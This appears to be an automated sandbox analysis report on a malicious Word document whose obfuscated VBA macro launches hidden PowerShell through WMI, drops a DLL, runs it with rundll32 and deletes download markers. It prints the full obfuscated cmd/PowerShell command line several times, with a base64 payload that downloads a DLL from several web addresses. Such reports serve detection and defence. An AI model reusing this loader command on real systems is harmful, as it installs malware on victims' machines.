Source:	Binary string: E:\WindowsSDK7-Samples-master\WindowsSDK7-Samples-master\winui\shell\appshellintegration\RecipePropertyHandler\Win32\Release\RecipePropertyHandler.pdb source: rundll32.exe, 00000007.00000002.2107205088.000000001000D000.00000002.00020000.sdmp
Source:	Binary string: C:\Windows\assembly\GAC_MSIL\System.Management.Automation\1.0.0.0__31bf3856ad364e35\System.Management.Automation.pdb source: powershell.exe, 00000005.00000002.2099168387.0000000002B87000.00000004.00000040.sdmp
Source:	Binary string: ws\System.Management.Automation.pdbpdbion.pdbERSP source: powershell.exe, 00000005.00000002.2099168387.0000000002B87000.00000004.00000040.sdmp
Source:	Binary string: C:\Windows\System.Management.Automation.pdb source: powershell.exe, 00000005.00000002.2099168387.0000000002B87000.00000004.00000040.sdmp
Source:	Binary string: mscorrc.pdb source: powershell.exe, 00000005.00000002.2096601177.0000000002110000.00000002.00000001.sdmp

Source: pack 2254794.doc

Initial sample: OLE summary subject = backing up Grove Avon systematic copy THX Steel functionalities Upgradable infrastructure Technician

Data Obfuscation:

Document contains an embedded VBA with many GOTO operations indicating source code obfuscation

Show sources

Source: pack 2254794.doc	Stream path 'Macros/VBA/Oi5oelv0_s4' : High number of GOTO operations
Source: VBA code instrumentation	OLE, VBA macro, High number of GOTO operations: Module Oi5oelv0_s4			Name: Oi5oelv0_s4

Obfuscated command line found

Show sources

Source: unknown

Process created: C:\Windows\System32\cmd.exe cmd cmd cmd cmd /c msg %username% /v Word experienced an error trying to open the file. & P^Ow^er^she^L^L -w hidden -ENCOD JAA5ADUAWABVAGMARAAgACAAPQAgACAAWwBUAFkAcABFAF0AKAAiAHsAMAB9AHsAMgB9AHsANAB9AHsAMwB9AHsAMQB9ACIAIAAtAGYAJwBTAFkAUwBUAGUAJwAsACcAQwBUAE8AUgB5ACcALAAnAE0AJwAsACcAUgBFACcALAAnAC4AaQBvAC4AZABJACcAKQAgACAAOwAgACAAcwBFAFQALQBJAHQARQBtACAAIAAoACcAVgAnACsAJwBhAHIAaQBBAEIATABlACcAKwAnADoARgBJAFUAJwApACAAIAAoACAAIABbAHQAeQBwAEUAXQAoACIAewAxAH0AewA0AH0AewAwAH0AewA2AH0AewA1AH0AewAzAH0AewAyAH0AIgAgAC0AZgAnAE0ALgBuAEUAVAAuAFMAZQBSACcALAAnAHMAWQBzAHQAJwAsACcAVABNAGEATgBBAEcAZQByACcALAAnAE4AJwAsACcARQAnACwAJwBJACcALAAnAHYASQBjAEUAUABvACcAKQApADsAJABFAHIAcgBvAHIAQQBjAHQAaQBvAG4AUAByAGUAZgBlAHIAZQBuAGMAZQAgAD0AIAAoACcAUwBpACcAKwAoACcAbABlACcAKwAnAG4AJwApACsAKAAnAHQAJwArACcAbAB5AEMAJwApACsAKAAnAG8AJwArACcAbgB0ACcAKQArACgAJwBpACcAKwAnAG4AdQBlACcAKQApADsAJABIAGMANgBjADYAdQB5AD0AJABJADcANgBDACAAKwAgAFsAYwBoAGEAcgBdACgANgA0ACkAIAArACAAJABUADMANgBTADsAJABWADAANgBCAD0AKAAnAEkAMwAnACsAJwA5AEgAJwApADsAIAAgACgAZwBjAEkAIAAoACIAVgBBACIAKwAiAHIAaQBBAEIAIgArACIAbAAiACsAIgBFADoAOQA1ACIAKwAiAFgAdQBDAGQAIgApACAAIAApAC4AVgBhAEwAVQBlADoAOgAiAGMAUgBlAGEAVABgAEUAZABgAEkAUgBgAEUAYABDAFQATwBSAFkAIgAoACQASABPAE0ARQAgACsAIAAoACgAJwB7ADAAfQBDADMAcgBlACcAKwAnADUAYwAzAHsAMAB9ACcAKwAnAEQAaQAnACsAJwBfAHAAJwArACcAMwAnACsAJwBjADkAJwArACcAewAwAH0AJwApAC0AZgAgAFsAQwBIAEEAUgBdADkAMgApACkAOwAkAEQAMQA1AEIAPQAoACgAJwBHADIAJwArACcAOAAnACkAKwAnAE8AJwApADsAIAAkAGYAaQB1ADoAOgAiAHMAZQBgAGMAYABVAHIASQBUAFkAcABSAG8AVABPAGAAYwBPAEwAIgAgAD0AIAAoACgAJwBUACcAKwAnAGwAcwAnACkAKwAnADEAMgAnACkAOwAkAFIAMwAyAEYAPQAoACcARwAnACsAKAAnADEANgAnACsAJwBaACcAKQApADsAJABDADcAegBpADkAdQB1ACAAPQAgACgAJwBPACcAKwAoACcAXwAnACsAJwA1AFoAJwApACkAOwAkAFcAXwAxAEQAPQAoACcARQAnACsAKAAnADEAOQAnACsAJwBUACcAKQApADsAJABXADcAaQBvADAAdwBnAD0AJABIAE8ATQBFACsAKAAoACcAewAwAH0AJwArACgAJwBDACcAKwAnADMAcgBlADUAJwApACsAJwBjADMAJwArACcAewAnACsAJwAwAH0ARABpAF8AcAAzAGMAJwArACcAOQB7ACcAKwAnADAAfQAnACkALQBGAFsAQwBoAGEAcgBdADkAMgApACsAJABDADcAegBpADkAdQB1ACsAKAAnAC4AZAAnACsAJwBsAGwAJwApADsAJABIADMANgBBAD0AKAAnAFIAJwArACgAJwA2AF8AJwArACcATwAnACkAKQA7ACQARwByADYAeABfAGgAXwA9ACgAKAAnAF0AYQAnACsAJwBuAHcAWwAzACcAKwAnADoALwAnACkAKwAnAC8AJwArACgAJwBwACcAKwAnAGUAdABhAGYAJwApACsAKAAnAGkAbABtACcAKwAnAC4AYwBvACcAKQArACcAbQAnACsAKAAnAC8AdwAnACsAJwBwACcAKQArACgAJwAtAGEAJwArACcAZABtACcAKwAnAGkAbgAnACsAJwAvADQAbQAvAEAAXQAnACkAKwAnAGEAJwArACgAJwBuACcAKwAnAHcAWwAzACcAKwAnADoALwAvAGcAaQAnACsAJwB2AGkAJwApACsAKAAnAG4AZwAnACsAJwB0AGgAYQAnACsAJwBuAGsAcwBkACcAKQArACcAYQBpACcAKwAnAGwAJwArACgAJwB5AC4AYwAnACsAJwBvAG0ALwBxAGwARQAvAFYAZQBGAC8AJwArACcAQABdAGEAJwArACcAbgAnACkAKwAoACcAdwAnACsAJwBbADMAOgAvAC8AdwAnACkAKwAoACcAYQBwACcAKwAnAC4AJwApACsAJwB6AGgAJwArACgAJwBvAG4AZwAnACsAJwBsACcAKQArACcAaQAnACsAKAAnAHMAYwAnACsAJwAuAGMAJwArACcAbwAnACsAJwBtAC8AdwBwAC0AaQBuAGMAJwApACsAKAAnAGwAdQAnACsAJwBkAGUAcwAnACsAJwAvAFEAcgAnACsAJwB5AEMAJwApACsAJwBCAC8AJwArACcAQAAnACsAKAAnAF0AJwArACcAYQBuAHcAJwApACsAKAAnAFsAMwAnACsAJwBzADoALwAnACsA

PowerShell case anomaly found

Show sources

Source: unknown	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe POwersheLL -w hidden -ENCOD JAA5ADUAWABVAGMARAAgACAAPQAgACAAWwBUAFkAcABFAF0AKAAiAHsAMAB9AHsAMgB9AHsANAB9AHsAMwB9AHsAMQB9ACIAIAAtAGYAJwBTAFkAUwBUAGUAJwAsACcAQwBUAE8AUgB5ACcALAAnAE0AJwAsACcAUgBFACcALAAnAC4AaQBvAC4AZABJACcAKQAgACAAOwAgACAAcwBFAFQALQBJAHQARQBtACAAIAAoACcAVgAnACsAJwBhAHIAaQBBAEIATABlACcAKwAnADoARgBJAFUAJwApACAAIAAoACAAIABbAHQAeQBwAEUAXQAoACIAewAxAH0AewA0AH0AewAwAH0AewA2AH0AewA1AH0AewAzAH0AewAyAH0AIgAgAC0AZgAnAE0ALgBuAEUAVAAuAFMAZQBSACcALAAnAHMAWQBzAHQAJwAsACcAVABNAGEATgBBAEcAZQByACcALAAnAE4AJwAsACcARQAnACwAJwBJACcALAAnAHYASQBjAEUAUABvACcAKQApADsAJABFAHIAcgBvAHIAQQBjAHQAaQBvAG4AUAByAGUAZgBlAHIAZQBuAGMAZQAgAD0AIAAoACcAUwBpACcAKwAoACcAbABlACcAKwAnAG4AJwApACsAKAAnAHQAJwArACcAbAB5AEMAJwApACsAKAAnAG8AJwArACcAbgB0ACcAKQArACgAJwBpACcAKwAnAG4AdQBlACcAKQApADsAJABIAGMANgBjADYAdQB5AD0AJABJADcANgBDACAAKwAgAFsAYwBoAGEAcgBdACgANgA0ACkAIAArACAAJABUADMANgBTADsAJABWADAANgBCAD0AKAAnAEkAMwAnACsAJwA5AEgAJwApADsAIAAgACgAZwBjAEkAIAAoACIAVgBBACIAKwAiAHIAaQBBAEIAIgArACIAbAAiACsAIgBFADoAOQA1ACIAKwAiAFgAdQBDAGQAIgApACAAIAApAC4AVgBhAEwAVQBlADoAOgAiAGMAUgBlAGEAVABgAEUAZABgAEkAUgBgAEUAYABDAFQATwBSAFkAIgAoACQASABPAE0ARQAgACsAIAAoACgAJwB7ADAAfQBDADMAcgBlACcAKwAnADUAYwAzAHsAMAB9ACcAKwAnAEQAaQAnACsAJwBfAHAAJwArACcAMwAnACsAJwBjADkAJwArACcAewAwAH0AJwApAC0AZgAgAFsAQwBIAEEAUgBdADkAMgApACkAOwAkAEQAMQA1AEIAPQAoACgAJwBHADIAJwArACcAOAAnACkAKwAnAE8AJwApADsAIAAkAGYAaQB1ADoAOgAiAHMAZQBgAGMAYABVAHIASQBUAFkAcABSAG8AVABPAGAAYwBPAEwAIgAgAD0AIAAoACgAJwBUACcAKwAnAGwAcwAnACkAKwAnADEAMgAnACkAOwAkAFIAMwAyAEYAPQAoACcARwAnACsAKAAnADEANgAnACsAJwBaACcAKQApADsAJABDADcAegBpADkAdQB1ACAAPQAgACgAJwBPACcAKwAoACcAXwAnACsAJwA1AFoAJwApACkAOwAkAFcAXwAxAEQAPQAoACcARQAnACsAKAAnADEAOQAnACsAJwBUACcAKQApADsAJABXADcAaQBvADAAdwBnAD0AJABIAE8ATQBFACsAKAAoACcAewAwAH0AJwArACgAJwBDACcAKwAnADMAcgBlADUAJwApACsAJwBjADMAJwArACcAewAnACsAJwAwAH0ARABpAF8AcAAzAGMAJwArACcAOQB7ACcAKwAnADAAfQAnACkALQBGAFsAQwBoAGEAcgBdADkAMgApACsAJABDADcAegBpADkAdQB1ACsAKAAnAC4AZAAnACsAJwBsAGwAJwApADsAJABIADMANgBBAD0AKAAnAFIAJwArACgAJwA2AF8AJwArACcATwAnACkAKQA7ACQARwByADYAeABfAGgAXwA9ACgAKAAnAF0AYQAnACsAJwBuAHcAWwAzACcAKwAnADoALwAnACkAKwAnAC8AJwArACgAJwBwACcAKwAnAGUAdABhAGYAJwApACsAKAAnAGkAbABtACcAKwAnAC4AYwBvACcAKQArACcAbQAnACsAKAAnAC8AdwAnACsAJwBwACcAKQArACgAJwAtAGEAJwArACcAZABtACcAKwAnAGkAbgAnACsAJwAvADQAbQAvAEAAXQAnACkAKwAnAGEAJwArACgAJwBuACcAKwAnAHcAWwAzACcAKwAnADoALwAvAGcAaQAnACsAJwB2AGkAJwApACsAKAAnAG4AZwAnACsAJwB0AGgAYQAnACsAJwBuAGsAcwBkACcAKQArACcAYQBpACcAKwAnAGwAJwArACgAJwB5AC4AYwAnACsAJwBvAG0ALwBxAGwARQAvAFYAZQBGAC8AJwArACcAQABdAGEAJwArACcAbgAnACkAKwAoACcAdwAnACsAJwBbADMAOgAvAC8AdwAnACkAKwAoACcAYQBwACcAKwAnAC4AJwApACsAJwB6AGgAJwArACgAJwBvAG4AZwAnACsAJwBsACcAKQArACcAaQAnACsAKAAnAHMAYwAnACsAJwAuAGMAJwArACcAbwAnACsAJwBtAC8AdwBwAC0AaQBuAGMAJwApACsAKAAnAGwAdQAnACsAJwBkAGUAcwAnACsAJwAvAFEAcgAnACsAJwB5AEMAJwApACsAJwBCAC8AJwArACcAQAAnACsAKAAnAF0AJwArACcAYQBuAHcAJwApACsAKAAnAFsAMwAnACsAJwBzADoALwAnACsAJwAvAGYAJwArACcAbgAnACsAJwBqAGIAcQAuAGMAbwBtAC8AdwBwAC0AaQAnACkAK
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe POwersheLL -w hidden -ENCOD JAA5ADUAWABVAGMARAAgACAAPQAgACAAWwBUAFkAcABFAF0AKAAiAHsAMAB9AHsAMgB9AHsANAB9AHsAMwB9AHsAMQB9ACIAIAAtAGYAJwBTAFkAUwBUAGUAJwAsACcAQwBUAE8AUgB5ACcALAAnAE0AJwAsACcAUgBFACcALAAnAC4AaQBvAC4AZABJACcAKQAgACAAOwAgACAAcwBFAFQALQBJAHQARQBtACAAIAAoACcAVgAnACsAJwBhAHIAaQBBAEIATABlACcAKwAnADoARgBJAFUAJwApACAAIAAoACAAIABbAHQAeQBwAEUAXQAoACIAewAxAH0AewA0AH0AewAwAH0AewA2AH0AewA1AH0AewAzAH0AewAyAH0AIgAgAC0AZgAnAE0ALgBuAEUAVAAuAFMAZQBSACcALAAnAHMAWQBzAHQAJwAsACcAVABNAGEATgBBAEcAZQByACcALAAnAE4AJwAsACcARQAnACwAJwBJACcALAAnAHYASQBjAEUAUABvACcAKQApADsAJABFAHIAcgBvAHIAQQBjAHQAaQBvAG4AUAByAGUAZgBlAHIAZQBuAGMAZQAgAD0AIAAoACcAUwBpACcAKwAoACcAbABlACcAKwAnAG4AJwApACsAKAAnAHQAJwArACcAbAB5AEMAJwApACsAKAAnAG8AJwArACcAbgB0ACcAKQArACgAJwBpACcAKwAnAG4AdQBlACcAKQApADsAJABIAGMANgBjADYAdQB5AD0AJABJADcANgBDACAAKwAgAFsAYwBoAGEAcgBdACgANgA0ACkAIAArACAAJABUADMANgBTADsAJABWADAANgBCAD0AKAAnAEkAMwAnACsAJwA5AEgAJwApADsAIAAgACgAZwBjAEkAIAAoACIAVgBBACIAKwAiAHIAaQBBAEIAIgArACIAbAAiACsAIgBFADoAOQA1ACIAKwAiAFgAdQBDAGQAIgApACAAIAApAC4AVgBhAEwAVQBlADoAOgAiAGMAUgBlAGEAVABgAEUAZABgAEkAUgBgAEUAYABDAFQATwBSAFkAIgAoACQASABPAE0ARQAgACsAIAAoACgAJwB7ADAAfQBDADMAcgBlACcAKwAnADUAYwAzAHsAMAB9ACcAKwAnAEQAaQAnACsAJwBfAHAAJwArACcAMwAnACsAJwBjADkAJwArACcAewAwAH0AJwApAC0AZgAgAFsAQwBIAEEAUgBdADkAMgApACkAOwAkAEQAMQA1AEIAPQAoACgAJwBHADIAJwArACcAOAAnACkAKwAnAE8AJwApADsAIAAkAGYAaQB1ADoAOgAiAHMAZQBgAGMAYABVAHIASQBUAFkAcABSAG8AVABPAGAAYwBPAEwAIgAgAD0AIAAoACgAJwBUACcAKwAnAGwAcwAnACkAKwAnADEAMgAnACkAOwAkAFIAMwAyAEYAPQAoACcARwAnACsAKAAnADEANgAnACsAJwBaACcAKQApADsAJABDADcAegBpADkAdQB1ACAAPQAgACgAJwBPACcAKwAoACcAXwAnACsAJwA1AFoAJwApACkAOwAkAFcAXwAxAEQAPQAoACcARQAnACsAKAAnADEAOQAnACsAJwBUACcAKQApADsAJABXADcAaQBvADAAdwBnAD0AJABIAE8ATQBFACsAKAAoACcAewAwAH0AJwArACgAJwBDACcAKwAnADMAcgBlADUAJwApACsAJwBjADMAJwArACcAewAnACsAJwAwAH0ARABpAF8AcAAzAGMAJwArACcAOQB7ACcAKwAnADAAfQAnACkALQBGAFsAQwBoAGEAcgBdADkAMgApACsAJABDADcAegBpADkAdQB1ACsAKAAnAC4AZAAnACsAJwBsAGwAJwApADsAJABIADMANgBBAD0AKAAnAFIAJwArACgAJwA2AF8AJwArACcATwAnACkAKQA7ACQARwByADYAeABfAGgAXwA9ACgAKAAnAF0AYQAnACsAJwBuAHcAWwAzACcAKwAnADoALwAnACkAKwAnAC8AJwArACgAJwBwACcAKwAnAGUAdABhAGYAJwApACsAKAAnAGkAbABtACcAKwAnAC4AYwBvACcAKQArACcAbQAnACsAKAAnAC8AdwAnACsAJwBwACcAKQArACgAJwAtAGEAJwArACcAZABtACcAKwAnAGkAbgAnACsAJwAvADQAbQAvAEAAXQAnACkAKwAnAGEAJwArACgAJwBuACcAKwAnAHcAWwAzACcAKwAnADoALwAvAGcAaQAnACsAJwB2AGkAJwApACsAKAAnAG4AZwAnACsAJwB0AGgAYQAnACsAJwBuAGsAcwBkACcAKQArACcAYQBpACcAKwAnAGwAJwArACgAJwB5AC4AYwAnACsAJwBvAG0ALwBxAGwARQAvAFYAZQBGAC8AJwArACcAQABdAGEAJwArACcAbgAnACkAKwAoACcAdwAnACsAJwBbADMAOgAvAC8AdwAnACkAKwAoACcAYQBwACcAKwAnAC4AJwApACsAJwB6AGgAJwArACgAJwBvAG4AZwAnACsAJwBsACcAKQArACcAaQAnACsAKAAnAHMAYwAnACsAJwAuAGMAJwArACcAbwAnACsAJwBtAC8AdwBwAC0AaQBuAGMAJwApACsAKAAnAGwAdQAnACsAJwBkAGUAcwAnACsAJwAvAFEAcgAnACsAJwB5AEMAJwApACsAJwBCAC8AJwArACcAQAAnACsAKAAnAF0AJwArACcAYQBuAHcAJwApACsAKAAnAFsAMwAnACsAJwBzADoALwAnACsAJwAvAGYAJwArACcAbgAnACsAJwBqAGIAcQAuAGMAbwBtAC8AdwBwAC0AaQAnACkAK			Jump to behavior

Suspicious powershell command line found

Show sources

Source: unknown	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe POwersheLL -w hidden -ENCOD JAA5ADUAWABVAGMARAAgACAAPQAgACAAWwBUAFkAcABFAF0AKAAiAHsAMAB9AHsAMgB9AHsANAB9AHsAMwB9AHsAMQB9ACIAIAAtAGYAJwBTAFkAUwBUAGUAJwAsACcAQwBUAE8AUgB5ACcALAAnAE0AJwAsACcAUgBFACcALAAnAC4AaQBvAC4AZABJACcAKQAgACAAOwAgACAAcwBFAFQALQBJAHQARQBtACAAIAAoACcAVgAnACsAJwBhAHIAaQBBAEIATABlACcAKwAnADoARgBJAFUAJwApACAAIAAoACAAIABbAHQAeQBwAEUAXQAoACIAewAxAH0AewA0AH0AewAwAH0AewA2AH0AewA1AH0AewAzAH0AewAyAH0AIgAgAC0AZgAnAE0ALgBuAEUAVAAuAFMAZQBSACcALAAnAHMAWQBzAHQAJwAsACcAVABNAGEATgBBAEcAZQByACcALAAnAE4AJwAsACcARQAnACwAJwBJACcALAAnAHYASQBjAEUAUABvACcAKQApADsAJABFAHIAcgBvAHIAQQBjAHQAaQBvAG4AUAByAGUAZgBlAHIAZQBuAGMAZQAgAD0AIAAoACcAUwBpACcAKwAoACcAbABlACcAKwAnAG4AJwApACsAKAAnAHQAJwArACcAbAB5AEMAJwApACsAKAAnAG8AJwArACcAbgB0ACcAKQArACgAJwBpACcAKwAnAG4AdQBlACcAKQApADsAJABIAGMANgBjADYAdQB5AD0AJABJADcANgBDACAAKwAgAFsAYwBoAGEAcgBdACgANgA0ACkAIAArACAAJABUADMANgBTADsAJABWADAANgBCAD0AKAAnAEkAMwAnACsAJwA5AEgAJwApADsAIAAgACgAZwBjAEkAIAAoACIAVgBBACIAKwAiAHIAaQBBAEIAIgArACIAbAAiACsAIgBFADoAOQA1ACIAKwAiAFgAdQBDAGQAIgApACAAIAApAC4AVgBhAEwAVQBlADoAOgAiAGMAUgBlAGEAVABgAEUAZABgAEkAUgBgAEUAYABDAFQATwBSAFkAIgAoACQASABPAE0ARQAgACsAIAAoACgAJwB7ADAAfQBDADMAcgBlACcAKwAnADUAYwAzAHsAMAB9ACcAKwAnAEQAaQAnACsAJwBfAHAAJwArACcAMwAnACsAJwBjADkAJwArACcAewAwAH0AJwApAC0AZgAgAFsAQwBIAEEAUgBdADkAMgApACkAOwAkAEQAMQA1AEIAPQAoACgAJwBHADIAJwArACcAOAAnACkAKwAnAE8AJwApADsAIAAkAGYAaQB1ADoAOgAiAHMAZQBgAGMAYABVAHIASQBUAFkAcABSAG8AVABPAGAAYwBPAEwAIgAgAD0AIAAoACgAJwBUACcAKwAnAGwAcwAnACkAKwAnADEAMgAnACkAOwAkAFIAMwAyAEYAPQAoACcARwAnACsAKAAnADEANgAnACsAJwBaACcAKQApADsAJABDADcAegBpADkAdQB1ACAAPQAgACgAJwBPACcAKwAoACcAXwAnACsAJwA1AFoAJwApACkAOwAkAFcAXwAxAEQAPQAoACcARQAnACsAKAAnADEAOQAnACsAJwBUACcAKQApADsAJABXADcAaQBvADAAdwBnAD0AJABIAE8ATQBFACsAKAAoACcAewAwAH0AJwArACgAJwBDACcAKwAnADMAcgBlADUAJwApACsAJwBjADMAJwArACcAewAnACsAJwAwAH0ARABpAF8AcAAzAGMAJwArACcAOQB7ACcAKwAnADAAfQAnACkALQBGAFsAQwBoAGEAcgBdADkAMgApACsAJABDADcAegBpADkAdQB1ACsAKAAnAC4AZAAnACsAJwBsAGwAJwApADsAJABIADMANgBBAD0AKAAnAFIAJwArACgAJwA2AF8AJwArACcATwAnACkAKQA7ACQARwByADYAeABfAGgAXwA9ACgAKAAnAF0AYQAnACsAJwBuAHcAWwAzACcAKwAnADoALwAnACkAKwAnAC8AJwArACgAJwBwACcAKwAnAGUAdABhAGYAJwApACsAKAAnAGkAbABtACcAKwAnAC4AYwBvACcAKQArACcAbQAnACsAKAAnAC8AdwAnACsAJwBwACcAKQArACgAJwAtAGEAJwArACcAZABtACcAKwAnAGkAbgAnACsAJwAvADQAbQAvAEAAXQAnACkAKwAnAGEAJwArACgAJwBuACcAKwAnAHcAWwAzACcAKwAnADoALwAvAGcAaQAnACsAJwB2AGkAJwApACsAKAAnAG4AZwAnACsAJwB0AGgAYQAnACsAJwBuAGsAcwBkACcAKQArACcAYQBpACcAKwAnAGwAJwArACgAJwB5AC4AYwAnACsAJwBvAG0ALwBxAGwARQAvAFYAZQBGAC8AJwArACcAQABdAGEAJwArACcAbgAnACkAKwAoACcAdwAnACsAJwBbADMAOgAvAC8AdwAnACkAKwAoACcAYQBwACcAKwAnAC4AJwApACsAJwB6AGgAJwArACgAJwBvAG4AZwAnACsAJwBsACcAKQArACcAaQAnACsAKAAnAHMAYwAnACsAJwAuAGMAJwArACcAbwAnACsAJwBtAC8AdwBwAC0AaQBuAGMAJwApACsAKAAnAGwAdQAnACsAJwBkAGUAcwAnACsAJwAvAFEAcgAnACsAJwB5AEMAJwApACsAJwBCAC8AJwArACcAQAAnACsAKAAnAF0AJwArACcAYQBuAHcAJwApACsAKAAnAFsAMwAnACsAJwBzADoALwAnACsAJwAvAGYAJwArACcAbgAnACsAJwBqAGIAcQAuAGMAbwBtAC8AdwBwAC0AaQAnACkAK
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe POwersheLL -w hidden -ENCOD JAA5ADUAWABVAGMARAAgACAAPQAgACAAWwBUAFkAcABFAF0AKAAiAHsAMAB9AHsAMgB9AHsANAB9AHsAMwB9AHsAMQB9ACIAIAAtAGYAJwBTAFkAUwBUAGUAJwAsACcAQwBUAE8AUgB5ACcALAAnAE0AJwAsACcAUgBFACcALAAnAC4AaQBvAC4AZABJACcAKQAgACAAOwAgACAAcwBFAFQALQBJAHQARQBtACAAIAAoACcAVgAnACsAJwBhAHIAaQBBAEIATABlACcAKwAnADoARgBJAFUAJwApACAAIAAoACAAIABbAHQAeQBwAEUAXQAoACIAewAxAH0AewA0AH0AewAwAH0AewA2AH0AewA1AH0AewAzAH0AewAyAH0AIgAgAC0AZgAnAE0ALgBuAEUAVAAuAFMAZQBSACcALAAnAHMAWQBzAHQAJwAsACcAVABNAGEATgBBAEcAZQByACcALAAnAE4AJwAsACcARQAnACwAJwBJACcALAAnAHYASQBjAEUAUABvACcAKQApADsAJABFAHIAcgBvAHIAQQBjAHQAaQBvAG4AUAByAGUAZgBlAHIAZQBuAGMAZQAgAD0AIAAoACcAUwBpACcAKwAoACcAbABlACcAKwAnAG4AJwApACsAKAAnAHQAJwArACcAbAB5AEMAJwApACsAKAAnAG8AJwArACcAbgB0ACcAKQArACgAJwBpACcAKwAnAG4AdQBlACcAKQApADsAJABIAGMANgBjADYAdQB5AD0AJABJADcANgBDACAAKwAgAFsAYwBoAGEAcgBdACgANgA0ACkAIAArACAAJABUADMANgBTADsAJABWADAANgBCAD0AKAAnAEkAMwAnACsAJwA5AEgAJwApADsAIAAgACgAZwBjAEkAIAAoACIAVgBBACIAKwAiAHIAaQBBAEIAIgArACIAbAAiACsAIgBFADoAOQA1ACIAKwAiAFgAdQBDAGQAIgApACAAIAApAC4AVgBhAEwAVQBlADoAOgAiAGMAUgBlAGEAVABgAEUAZABgAEkAUgBgAEUAYABDAFQATwBSAFkAIgAoACQASABPAE0ARQAgACsAIAAoACgAJwB7ADAAfQBDADMAcgBlACcAKwAnADUAYwAzAHsAMAB9ACcAKwAnAEQAaQAnACsAJwBfAHAAJwArACcAMwAnACsAJwBjADkAJwArACcAewAwAH0AJwApAC0AZgAgAFsAQwBIAEEAUgBdADkAMgApACkAOwAkAEQAMQA1AEIAPQAoACgAJwBHADIAJwArACcAOAAnACkAKwAnAE8AJwApADsAIAAkAGYAaQB1ADoAOgAiAHMAZQBgAGMAYABVAHIASQBUAFkAcABSAG8AVABPAGAAYwBPAEwAIgAgAD0AIAAoACgAJwBUACcAKwAnAGwAcwAnACkAKwAnADEAMgAnACkAOwAkAFIAMwAyAEYAPQAoACcARwAnACsAKAAnADEANgAnACsAJwBaACcAKQApADsAJABDADcAegBpADkAdQB1ACAAPQAgACgAJwBPACcAKwAoACcAXwAnACsAJwA1AFoAJwApACkAOwAkAFcAXwAxAEQAPQAoACcARQAnACsAKAAnADEAOQAnACsAJwBUACcAKQApADsAJABXADcAaQBvADAAdwBnAD0AJABIAE8ATQBFACsAKAAoACcAewAwAH0AJwArACgAJwBDACcAKwAnADMAcgBlADUAJwApACsAJwBjADMAJwArACcAewAnACsAJwAwAH0ARABpAF8AcAAzAGMAJwArACcAOQB7ACcAKwAnADAAfQAnACkALQBGAFsAQwBoAGEAcgBdADkAMgApACsAJABDADcAegBpADkAdQB1ACsAKAAnAC4AZAAnACsAJwBsAGwAJwApADsAJABIADMANgBBAD0AKAAnAFIAJwArACgAJwA2AF8AJwArACcATwAnACkAKQA7ACQARwByADYAeABfAGgAXwA9ACgAKAAnAF0AYQAnACsAJwBuAHcAWwAzACcAKwAnADoALwAnACkAKwAnAC8AJwArACgAJwBwACcAKwAnAGUAdABhAGYAJwApACsAKAAnAGkAbABtACcAKwAnAC4AYwBvACcAKQArACcAbQAnACsAKAAnAC8AdwAnACsAJwBwACcAKQArACgAJwAtAGEAJwArACcAZABtACcAKwAnAGkAbgAnACsAJwAvADQAbQAvAEAAXQAnACkAKwAnAGEAJwArACgAJwBuACcAKwAnAHcAWwAzACcAKwAnADoALwAvAGcAaQAnACsAJwB2AGkAJwApACsAKAAnAG4AZwAnACsAJwB0AGgAYQAnACsAJwBuAGsAcwBkACcAKQArACcAYQBpACcAKwAnAGwAJwArACgAJwB5AC4AYwAnACsAJwBvAG0ALwBxAGwARQAvAFYAZQBGAC8AJwArACcAQABdAGEAJwArACcAbgAnACkAKwAoACcAdwAnACsAJwBbADMAOgAvAC8AdwAnACkAKwAoACcAYQBwACcAKwAnAC4AJwApACsAJwB6AGgAJwArACgAJwBvAG4AZwAnACsAJwBsACcAKQArACcAaQAnACsAKAAnAHMAYwAnACsAJwAuAGMAJwArACcAbwAnACsAJwBtAC8AdwBwAC0AaQBuAGMAJwApACsAKAAnAGwAdQAnACsAJwBkAGUAcwAnACsAJwAvAFEAcgAnACsAJwB5AEMAJwApACsAJwBCAC8AJwArACcAQAAnACsAKAAnAF0AJwArACcAYQBuAHcAJwApACsAKAAnAFsAMwAnACsAJwBzADoALwAnACsAJwAvAGYAJwArACcAbgAnACsAJwBqAGIAcQAuAGMAbwBtAC8AdwBwAC0AaQAnACkAK			Jump to behavior

Source: C:\Windows\SysWOW64\rundll32.exe

Code function: 7_2_1000C620 EncodePointer,EncodePointer,___crtIsPackagedApp,LoadLibraryExW,GetLastError,LoadLibraryW,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,IsDebuggerPresent,OutputDebugStringW,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,

7_2_1000C620

Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_10008085 push ecx; ret		7_2_10008098
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_10004ADA push ecx; ret		7_2_10004AED

Persistence and Installation Behavior:

Creates processes via WMI

Show sources

Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE

WMI Queries: IWbemServices::ExecMethod - Win32_Process::Create

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

File created: C:\Users\user\C3re5c3\Di_p3c9\O_5Z.dll

Jump to dropped file

Source: C:\Windows\SysWOW64\rundll32.exe

PE file moved: C:\Windows\SysWOW64\Vgmfknuplwnwb\hrwkllpxgkmn.qzu

Jump to behavior

Hooking and other Techniques for Hiding and Protection:

Hides that the sample has been downloaded from the Internet (zone.identifier)

Show sources

Source: C:\Windows\SysWOW64\rundll32.exe	File opened: C:\Windows\SysWOW64\Vgmfknuplwnwb\hrwkllpxgkmn.qzu:Zone.Identifier read attributes \| delete	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	File opened: C:\Windows\SysWOW64\Jpacxmsgxplznz\gypawljxnacjh.cvj:Zone.Identifier read attributes \| delete	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	File opened: C:\Windows\SysWOW64\Crppsin\fgsajt.gvd:Zone.Identifier read attributes \| delete	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	File opened: C:\Windows\SysWOW64\Fohbyq\ikksw.jnv:Zone.Identifier read attributes \| delete	Jump to behavior

